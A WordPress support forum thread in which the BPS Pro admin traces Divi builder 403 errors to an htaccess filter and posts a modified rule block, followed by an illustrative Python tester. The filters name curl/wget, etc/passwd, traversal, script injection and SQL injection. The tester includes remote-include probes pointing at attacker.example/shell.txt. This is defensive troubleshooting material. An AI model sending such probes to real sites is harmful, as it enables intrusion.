Divi Theme-Related Security Log Entries
This topic has 7 replies, 2 voices, and was last updated 2 years, 5 months ago by Living Miracles.
Living Miracles
Participant
Hello,
On my SiteGround Dedicated server-hosted sites that use the Divi theme (a premium theme made by Elegant Themes), I recently noticed security log entries after updating the Divi theme and opening a page in the backend that uses the page builder that comes with the theme.
Here is an example of the log entries we’re seeing:
[403 POST Request: January 17, 2020 - 9:28 am] BPS Pro: 14.3 WP: 5.3.2 Event Code: BFHS - Blocked/Forbidden Hacker or Spammer Solution: N/A - Hacker/Spammer Blocked/Forbidden REMOTE_ADDR: 216.250.39.154 Host Name: d216-250-39-154.allwest.net SERVER_PROTOCOL: HTTP/1.0 HTTP_CLIENT_IP: HTTP_FORWARDED: HTTP_X_FORWARDED_FOR: HTTP_X_CLUSTER_CLIENT_IP: REQUEST_METHOD: POST HTTP_REFERER: https://domain.tld/?et_pb_preview=true&et_pb_preview_nonce=0e64d00e88&iframe_id=et-fb-preview-1579278494104-765 REQUEST_URI: /?et_pb_preview=true&et_pb_preview_nonce=0e64d00e88&iframe_id=et-fb-preview-1579278494104-765 QUERY_STRING: et_pb_preview=true&et_pb_preview_nonce=0e64d00e88&iframe_id=et-fb-preview-1579278494104-765 HTTP_USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 REQUEST BODY: et_pb_preview_nonce=0e64d00e88&is_fb_preview=true&shortcode=%5Bet_pb_section+fb_built%3D%221%22+admin_label%3D%22section%22+_builder_version%3D%223.22%22%5D%5Bet_pb_row+admin_label%3D%22row%22+_builder_version%3D%223.25%22+background_size%3D%22initial%22+background_position%3D%22top_left%22+background_repeat%3D%22repeat%22%5D%5Bet_pb_column+type%3D%224_4%22+_builder_version%3D%223.25%22+custom_padding%3D%22%7C%7C%7C%22+custom_padding__hover%3D%22%7C%7C%7C%22%5D%5Bet_pb_post_title+meta%3D%22off%2
Here is what I can see: The “et_” is definitely from the Divi theme or builder (“et” stands for Elegant Themes). It seems that this should be a normal theme-related process that shouldn’t be getting flagged by BPS Pro, yet for some reason it is getting flagged as “BFHS – Blocked/Forbidden Hacker or Spammer.” Can you see what is in this log entry that’s getting flagged by BPS Pro?
Ideally, I wouldn’t want to get these security log entries each time I open a page in the backend to edit. Are you able to tell if this issue is on BPS Pro’s or Elegant Themes’ end? If it is on Elegant Themes’ end, could you suggest something I should pass along to them so that they can resolve the issue?
FYI, even though we are seeing those security log entries, it does appear that the builder functions properly.
Thank you!
Nicolas from Living Miracles
AITpro Admin
Keymaster
See this forum topic for the solution > https://forum.ait-pro.com/forums/topic/whitelist-monarch-plugin/#post-37359
Living Miracles
Participant
Okay, thank you for the response. We’ll try this out across our sites when we have the time and see if this resolves the issue.
Nicolas from Living Miracles
Living Miracles
Participant
Hello,
We randomly ran into another Divi theme-related 403 error today on one of our sites. All we did was try to export a page through the Divi builder. So far, this 403 error isn’t happening consistently across all the pages; it is only on one or two pages, but the reason isn’t obvious yet. The following GET request block is what we’re seeing in the Security Log entry:
[403 GET Request: June 20, 2021 - 1:31 pm] BPS Pro: 15.3 WP: 5.7.2 Event Code: BFHS - Blocked/Forbidden Hacker or Spammer Solution: N/A - Hacker/Spammer Blocked/Forbidden REMOTE_ADDR: Our.IP.Address Host Name: Our.ISP.Host.Name SERVER_PROTOCOL: HTTP/1.0 HTTP_CLIENT_IP: HTTP_FORWARDED: HTTP_X_FORWARDED_FOR: Our.IP.Address HTTP_X_CLUSTER_CLIENT_IP: REQUEST_METHOD: GET HTTP_REFERER: https://domain.tld/what-is-a-mystery-school/?et_fb=1&et_bfb=1&PageSpeed=off REQUEST_URI: /wp-admin/?et_core_portability=1&context=et_builder&name=temp_name&nonce=288bee4b55&timestamp=1624195876&name=What%20Is%20a%20Mystery%20School? QUERY_STRING: et_core_portability=1&context=et_builder&name=temp_name&nonce=288bee4b55&timestamp=1624195876&name=What%20Is%20a%20Mystery%20School? HTTP_USER_AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36
Do you have any idea why this is happening only on one or two pages? I’ve never seen this particular issue before and we have many sites that use Divi. If I actually need to manually whitelist something here, can you tell me where in BPS Pro and how I would do this?
Thank you.
AITpro Admin
Keymaster
The 403 error is being caused by this security rule in the wp-admin htaccess file (not your Root htaccess file):

RewriteCond %{THE_REQUEST} (\?|\*|%2a)+(%20+|\s+|%20+\s+|\s+%20+|\s+%20+\s+)(http|https)(:/|/) [NC,OR]

%20 is the URL-encoded blank space. Note: The + sign is typically used these days instead of %20 for URL-encoding a blank space. To fix this problem do the steps below.

1. Copy the modified wp-admin htaccess code below and paste it into this wp-admin Custom Code text box (not a Root Custom Code text box): 4. CUSTOM CODE BPSQSE-check BPS QUERY STRING EXPLOITS AND FILTERS.
2. Click the Save wp-admin Custom Code button.
3. Go to the BPS Pro > Setup menu > Setup Wizard page and run the Pre-installation Wizard and Setup Wizard.

# BEGIN BPSQSE-check BPS QUERY STRING EXPLOITS AND FILTERS
# WORDPRESS WILL BREAK IF ALL THE BPSQSE FILTERS ARE DELETED
# Use BPS wp-admin Custom Code to modify/edit/change this code and to save it permanently.
RewriteCond %{HTTP_USER_AGENT} (%0A|%0D|%27|%3C|%3E|%00) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (;|<|>|'|"|\)|\(|%0A|%0D|%22|%27|%28|%3C|%3E|%00).*(libwww-perl|wget|python|nikto|curl|scan|java|winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner) [NC,OR]
RewriteCond %{THE_REQUEST} (\*|%2a)+(%20+|\s+|%20+\s+|\s+%20+|\s+%20+\s+)(http|https)(:/|/) [NC,OR]
RewriteCond %{THE_REQUEST} etc/passwd [NC,OR]
RewriteCond %{THE_REQUEST} cgi-bin [NC,OR]
RewriteCond %{THE_REQUEST} (%0A|%0D) [NC,OR]
RewriteCond %{REQUEST_URI} owssvr\.dll [NC,OR]
RewriteCond %{HTTP_REFERER} (%0A|%0D|%27|%3C|%3E|%00) [NC,OR]
RewriteCond %{HTTP_REFERER} \.opendirviewer\. [NC,OR]
RewriteCond %{HTTP_REFERER} users\.skynet\.be.* [NC,OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(http|https):// [NC,OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [NC,OR]
RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC,OR]
RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC,OR]
RewriteCond %{QUERY_STRING} (\.\./|%2e%2e%2f|%2e%2e/|\.\.%2f|%2e\.%2f|%2e\./|\.%2e%2f|\.%2e/) [NC,OR]
RewriteCond %{QUERY_STRING} ftp\: [NC,OR]
RewriteCond %{QUERY_STRING} (http|https)\: [NC,OR]
RewriteCond %{QUERY_STRING} \=\|w\| [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)cPath=(http|https)://(.*)$ [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR]
RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} ^.*(\(|\)|<|>).* [NC,OR]
RewriteCond %{QUERY_STRING} (NULL|OUTFILE|LOAD_FILE) [OR]
RewriteCond %{QUERY_STRING} (\.{1,}/)+(motd|etc|bin) [NC,OR]
RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR]
RewriteCond %{QUERY_STRING} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR]
RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR]
RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR]
RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR]
RewriteCond %{QUERY_STRING} (;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|drop|delete|update|cast|create|char|convert|alter|declare|order|script|set|md5|benchmark|encode) [NC,OR]
RewriteCond %{QUERY_STRING} (sp_executesql) [NC]
RewriteRule ^(.*)$ - [F]
# END BPSQSE-check BPS QUERY STRING EXPLOITS AND FILTERS
Living Miracles
Participant
Thanks for your quick reply, this fixed the issue!
Do you have any thoughts as to why this issue was only occurring on a couple of pages on this site at this point instead of affecting all of them? I just noticed that the two pages that are having this issue contain a ? question mark in the back-end page title whereas none of the other pages that the export worked for have this. Could this be the culprit? I notice that the security rule you pointed out doesn’t contain \?| after the opening parenthesis of that rule in the modified version.
Is this slightly modified wp-admin htaccess code something you think we’ll need to or would be worth adding to all of our sites, or at least all of our Divi-themed sites? Or do you think we should just wait to see if we eventually experience this issue on any of our other sites before adding it?
AITpro Admin
Keymaster
The problem is/was that this Query String:
What%20Is%20a%20Mystery%20School
matches that particular security rule that blocks several blank spaces in a Query String. The modification I made to that particular security rule now allows several blank spaces in Query Strings, which is safe/fine to do. Blocking the Asterisk character is the only important part of that security rule. It’s up to you if you want to add that security rule modification on your other sites or not.
Living Miracles
Participant
I see. Okay, thank you for the information. I believe that’s all for this issue now then. 🙏🏼
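The wp-admin THE_REQUEST rule discussed in this thread, checked against the request line of the blocked Divi export, as an added example that is not part of the original posts or of BPS Pro's own code. It uses Python's re module as a stand-in for Apache's PCRE evaluation of %{THE_REQUEST} (the [NC] flag is mapped to re.IGNORECASE); the nonce, timestamp, hostnames and the two remote-include style probe requests are constructed for illustration, not taken from any real log.

```python
import re
from typing import Optional

# Both regexes are copied from the thread: the stock BPS Pro wp-admin rule and the
# admin's modified version, which drops the "\?" alternative from the first group.
# Only the RewriteCond regex is modelled; Apache's [NC] flag becomes re.IGNORECASE.
ORIGINAL_RULE = r"(\?|\*|%2a)+(%20+|\s+|%20+\s+|\s+%20+|\s+%20+\s+)(http|https)(:/|/)"
MODIFIED_RULE = r"(\*|%2a)+(%20+|\s+|%20+\s+|\s+%20+|\s+%20+\s+)(http|https)(:/|/)"


def the_request(method: str, uri: str, protocol: str = "HTTP/1.0") -> str:
    """Build the raw request line, which is what Apache exposes as %{THE_REQUEST}.
    The query string stays percent-encoded, exactly as the client sent it."""
    return f"{method} {uri} {protocol}"


def rule_blocks(rule: str, request_line: str) -> bool:
    """True if the RewriteCond would match and the RewriteRule ^(.*)$ - [F] would fire."""
    return re.search(rule, request_line, re.IGNORECASE) is not None


def explain_match(rule: str, request_line: str) -> Optional[str]:
    """Return the exact substring of THE_REQUEST that triggered the rule, or None."""
    m = re.search(rule, request_line, re.IGNORECASE)
    return m.group(0) if m else None


# Constructed sample request lines (nonce, timestamp, hostnames and titles are illustrative).
SAMPLES = {
    # The Divi export from the thread: the page title ends in "?".
    "export_title_with_question_mark": the_request(
        "GET",
        "/wp-admin/?et_core_portability=1&context=et_builder&name=temp_name"
        "&nonce=288bee4b55&timestamp=1624195876&name=What%20Is%20a%20Mystery%20School?",
    ),
    # The same export for a page whose title contains no "?".
    "export_plain_title": the_request(
        "GET",
        "/wp-admin/?et_core_portability=1&context=et_builder&name=temp_name"
        "&nonce=288bee4b55&timestamp=1624195876&name=Divi%20Page",
    ),
    # Hypothetical remote-include style probe using "*": the part the rule is kept for.
    "rfi_probe_with_asterisk": the_request(
        "GET", "/index.php?page=*%20http://attacker.example/shell.txt", "HTTP/1.1"
    ),
    # Hypothetical probe that only the removed "\?" alternative would have caught.
    "rfi_probe_with_question_mark": the_request(
        "GET", "/index.php?%20http://attacker.example/shell.txt", "HTTP/1.1"
    ),
}


def evaluate(samples: dict = SAMPLES) -> dict:
    """Return {sample_name: (blocked_by_original_rule, blocked_by_modified_rule)}."""
    return {
        name: (rule_blocks(ORIGINAL_RULE, line), rule_blocks(MODIFIED_RULE, line))
        for name, line in samples.items()
    }


if __name__ == "__main__":
    for name, (orig, mod) in evaluate().items():
        print(f"{name:34s} original={orig!s:5s} modified={mod!s:5s}")
    print("matched text:", repr(explain_match(ORIGINAL_RULE, SAMPLES["export_title_with_question_mark"])))
```

Running this shows where the false positive actually comes from: the original rule matches the text "? HTTP/" in the request line, i.e. the trailing "?" of the page title, the single space before the protocol token, "HTTP" (which [NC] lets match "http"), and the "/" of "HTTP/1.0". That is why only pages with a question mark at the end of their title were blocked, and why the same export for a plain title passes both rules. The sample with "*%20http://" is still caught by the modified rule, while the "?%20http://" shape is no longer caught, which is the trade-off of dropping the "\?" alternative.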